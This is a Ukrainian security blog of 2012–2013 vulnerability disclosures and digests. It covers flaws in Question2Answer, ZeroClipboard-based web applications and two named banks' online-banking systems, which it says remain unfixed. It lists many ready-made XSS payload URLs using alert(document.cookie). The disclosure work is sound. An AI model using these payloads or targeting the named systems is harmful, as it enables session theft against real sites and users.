Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Arbitrary File Upload Vulnerability in Sitecom Home Storage Center (деталі)
• jQuery vulnerability (деталі)
• Command Injection Vulnerability in Sitecom Home Storage Center (деталі)
• rails security update (деталі)
• Forescout NAC (Network Access Control) multiple vulnerabilities (деталі)
• I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution (деталі)
• Forescout NAC multiple vulnerabilities (деталі)
• PHP-Fusion 7.02.05 SQL Injection (деталі)
• Heap-based buffer underflow in libxml2, as used in Google Chrome (деталі)
• SQLi found in Kodak Insite (деталі)

27.11.2012

У жовтні, 21.10.2012, я виявив Brute Force, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.02.2013

Brute Force (WASC-11):

В логін формі (http://site/login) немає захисту від BF атак.

Експлоіт:

Question2Answer BF.html

Insufficient Anti-automation (WASC-21):

На сторінці контактів (http://site/feedback) немає захисту від автоматизованих атак.

Експлоіт:

Question2Answer IAA.html

Cross-Site Request Forgery (WASC-09):

Немає захисту від CSRF атак в функціоналі логіна (http://site/login) і логаута (http://site/logout), та на інших сторінках (взагалі в системі відсутній такий захист). В наступному адвізорі я приведу приклад CSRF, що дозволяє захопити адмінський акаунт.

Відсутність капчі в формі логіна призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта), вищенаведений Brute Force та інші автоматизовані атаки.

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysija Newsletters, Google Document Embedder та Gallery. Для котрих з’явилися експлоіти. Wysija Newsletters - це плагін для відправки інформаційних листів, Google Document Embedder - це плагін для включення в сайт документів з сервісів Гугла, Gallery - це плагін для створення галерей зображень.

• SQL Injection Vulnerability in Wysija Newsletters WordPress Plugin (деталі)
• WordPress Google Document Embedder Arbitrary File Disclosure (деталі)
• WordPress Gallery 3.8.3 Arbitrary File Read (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

14.07.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://jsbni.kiev.ua - сайті банка “Національні інвестиції” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про peb.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка “Національні інвестиції”. Всього 109 уразливостей в системи IFOBS.

https://cbserver.jsbni.kiev.ua:7002/ifobsClient/

Дані уразливості досі не виправлені.

Після мого попереднього списку вразливих програм з ZeroClipboard.swf, у лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них em-shorty, RepRapCalculator, Fulcrum, Django і aCMS. Та існує багато інших уразливих веб додатків з ZeroClipboard10.swf (деякі з них також містять ZeroClipboard.swf).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в першому записі).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Django (різні веб додатки на Django фреймворку):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/media/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Окрім ZeroClipboard, в aCMS також є Cumulus (tagcloud.swf), уразливості в якому я оприлюднив (і частина з них була виправлена) ще в 2009 році.

http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Вразливі наступні веб додатки з флешкою: em-shorty 0.5.0 та попередні версії, RepRapCalculator, Fulcrum - всі версії даної CMS, Django - є багато веб сайтів на Django framework (зокрема Django 1.3.1 та Djangoplicity) з ZeroClipboard, aCMS 1.0.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPressSearch, XML Sitemap Generator та NextGEN Gallery. Для котрих з’явилися експлоіти. WordPressSearch - це плагін для пошуку нерухомості, XML Sitemap Generator - це плагін для створення xml-файлів карти сайту, NextGEN Gallery - це плагін для створення галерей зображень.

• WordPressSearch plugin SQL Injection Vulnerability (деталі)
• XML Sitemap Generator 3.2.8 Code Injection (деталі)
• WordPress NextGEN Gallery 1.9.10 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

30.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://peb.com.ua - сайті банка “Промэкономбанк” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про energobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Промекономбанк. Всього 109 уразливостей в системи IFOBS.

https://ibank.peb.com.ua:7002

Дані уразливості досі не виправлені.

У лютому, 17.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них YAML, Multiproject для Trac, UserCollections для Piwigo, TAO і TableTools для DataTables для jQuery. Та існує багато інших уразливих веб додатків з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height 

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

InfoGlue:

http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Вразливі наступні веб додатки з флешкою: YAML 4.0.2 та попередні версії, Multiproject 1.4.21 та попередні версії, UserCollections для Piwigo, TAO 2.3.1 та попередні версії, TableTools для DataTables для jQuery. Зокрема він постачається з InfoGlue 2.1 (та попередніми версіями) та OGDI Field 6.x-1.0 (та попередніми версіями) для Drupal.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

В даній добірці уразливості в веб додатках:

• RSA Data Protection Manager Multiple Vulnerabilities (деталі)
• Directory Traversal - EasyITSP <= 2.0.7 (деталі)
• Weak password encryption on Huawei products (деталі)
• 0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities (деталі)
• radsecproxy security update (деталі)
• Privilege Gaining in DataLife Engine (деталі)
• RSA Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerabilities (деталі)
• CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability (деталі)
• EMC Smarts Network Configuration Manager Multiple Vulnerabilities (деталі)
• jQuery vulnerability (деталі)

У лютому, 17.02.2013, я провів дослідження Cross-Site Scripting уразливостей в ZeroClipboard. Про що вже повідомив розробникам (старим і новим розробникам цього веб додатку).

Про ZeroClipboard я писав у вересні 2011 в статті Атаки через буфер обміну. Тоді я не проводив перевірки ZeroClipboard, лише звернув увагу на XSS через копіювання у буфер обміну та при вставці в html-форми.

На початку року hip провів перевірку ZeroClipboard. Він звернув увагу лише стосовно флешки в плагіні WP-Table Reloaded, але це не лише частина плагіна, а окремий додаток, що використовується в багатьох веб додатках і на багатьох сайтах.

Я раджу замість атакуючого коду hip використати мій варіант коду - в цьому випадку не буде зациклення алертбоксу. У версії флешки в WP-Table Reloaded XSS працює лише з параметром id (це явно модифікована версія флешки). Зате в офіційній версії ZeroClipboard без &width&height не спрацює і потрібно вказувати всі параметри.

XSS (WASC-08):

В оригінальній версії від Joseph Huckaby є дві флешки (ZeroClipboard.swf та ZeroClipboard10.swf), а нові версії від Jon Rohan і James M. Greene мають лише одну флешку (ZeroClipboard.swf).

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Також є XSS через текст, який копіюється в буфер обміну (clipText). І на тестовій сторінці (test.html), де виводиться інформація про те, який текст був скопійований, відбудеться виконання XSS коду, або при його вставці у html-форми, що вразливі до XSS через вставку (як я описав у вищезгаданій статті).

Це дуже поширена флешка (через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf). Цю та інші флекши для копіювання в буфер обміну я бачив на багатьох сайтів в Інтернеті. Ось приклад на www.slideshare.net.

XSS:

• alert(document.cookie)
• цікавий

Уразливі ZeroClipboard 1.0.7 та попередні версії. XSS через параметр id і через буфер обміну були виправлені в нових версіях ZeroClipboard від нових розробників. Остання версія ZeroClipboard 1.1.7 невразлива.